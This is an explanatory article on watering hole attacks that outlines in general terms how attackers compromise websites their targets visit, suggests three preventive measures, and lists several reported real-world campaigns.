Watering Hole Attacks - Explained

Watering hole attacks are effective because they are targeted, and they take advantage of the trust that users have in the websites they visit. By infecting a website that their intended victims are likely to visit, attackers can significantly increase their chances of success. In addition, watering hole attacks are difficult to detect, as the infected website may appear to be functioning normally, and the malware may not be detected by antivirus software.

How Does It Work?

• STEP 1: "RECONNAISSANCE"
  • Attackers identify and compromise a highly targeted website. They may also create and use their own websites to attack but it is hard to keep alive a website with malicious codes. Because the website will be blocked if it keeps containing malicious code. So it is better to identify and compromise a highly targeted website.
• STEP 2: "INFECTING THE TARGET"
  •  Once they have identified a target website, attackers will infect it with malware using a variety of techniques, such as exploiting vulnerabilities in the website's code or using social engineering tactics to trick website administrators into installing malware.
  • To infect a website attackers may use:

    • Vulnerability exploits: Detected vulnerabilities on a website may allow the attacker to gain access to the site's database or to execute arbitrary code on visitors' devices.

    • Malvertising exploits: Attackers can use malvertising to inject malicious code into legitimate advertisements that are displayed on a website. When a user clicks on the ad, they are redirected to a site that infects their device with malware.

    • Social engineering exploits: Attackers can use social engineering tactics to trick website administrators into installing malware on the site. For example, they may send a convincing email or message that appears to be from a legitimate source, such as a software vendor, and ask the administrator to download and install a malicious software update.

    • Zero-day exploits: A zero-day exploit is an exploit that targets a previously unknown vulnerability in software. These exploits are particularly dangerous because they are not yet known to the software vendor, so there is no patch or update available to fix the vulnerability.

• STEP 3: "WAITING FOR THE VICTIMS"
  • Aftter that attackers sit back and wait for infected systems to gather and store information. When a victim visits the infected website, their device becomes infected with malware. This malware can be used to steal sensitive information such as login credentials, financial information, or other personally identifiable information. Alternatively, the malware can be used to gain remote access to the victim's device, giving attackers full control over it.

3 Ways to Prevent Watering Hole Attacks

• Updating and Patching: Watering hole attacks typically take advantage of glitches and weaknesses to breach your device, therefore keeping your software and browsers up to date can substantially decrease the possibility of an attack. It is advisable to regularly check the security patches on the software developer's website, or alternatively, engage a managed IT services provider to ensure your system remains current.
• Monitoring Network Activity: In order to identify watering hole attacks, it is necessary to employ network security utilities. For instance, intrusion prevention systems enable the detection of unusual and harmful network actions. Alternatively, bandwidth management software facilitates the monitoring of user conduct and identification of unusual patterns, such as large data transfers or excessive downloads, that may signify an attack.
• Using VPN: If attackers are able to compromise websites that are exclusively visited by you and your staff, they can execute watering hole attacks that are more successful. To avoid this, it is recommended that you use a VPN and enable your browser's private browsing functionality to obscure your online activities.

Examples of Watering Hole Attacks

1. In December 2012, the Council on Foreign Relations website was found to be infected with malware through a zero-day vulnerability in Microsoft's Internet Explorer. In this attack, the malware was only deployed to users using Internet Explorer set to English, Chinese, Japanese, Korean and Russian.^{[Wikipedia-1]}
2. Havex was discovered in 2013 and is one of five known Industrial Control System (ICS) tailored malware developed in the past decade. Energetic Bear began utilizing Havex in a widespread espionage campaign targeting energy, aviation, pharmaceutical, defense, and petrochemical sectors. The campaign targeted victims primarily in the United States and Europe.^[Wikipedia-2] Havex exploited supply chain and watering-hole attacks on ICS vendor software in addition to spear phishing campaigns to gain access to victim systems.^[Wikipedia-3]
3. The United States Department of Homeland Security's Computer Emergency Readiness Team (US-CERT) issued an alert in 2014 warning of an increase in watering hole attacks, particularly targeting government and energy sector websites.
4. In 2019, cybersecurity firm ESET reported on a watering hole attack campaign that targeted several government websites in Central Asia. The attackers used a JavaScript backdoor to infect visitors with malware, which was used for espionage and data theft.
5. In 2020, cybersecurity researchers discovered a watering hole attack campaign targeting websites related to the US elections. The campaign used a fake Adobe Flash Player update to infect visitors with malware.
6. According to a 2021 report from cybersecurity firm Symantec, the healthcare sector was the most frequently targeted industry for watering hole attacks, accounting for 25% of all attacks observed.
7. Another 2021 report from cybersecurity firm FireEye found that Chinese state-sponsored threat actors used watering hole attacks to target organizations in Southeast Asia, particularly those involved in technology, finance, and government sectors.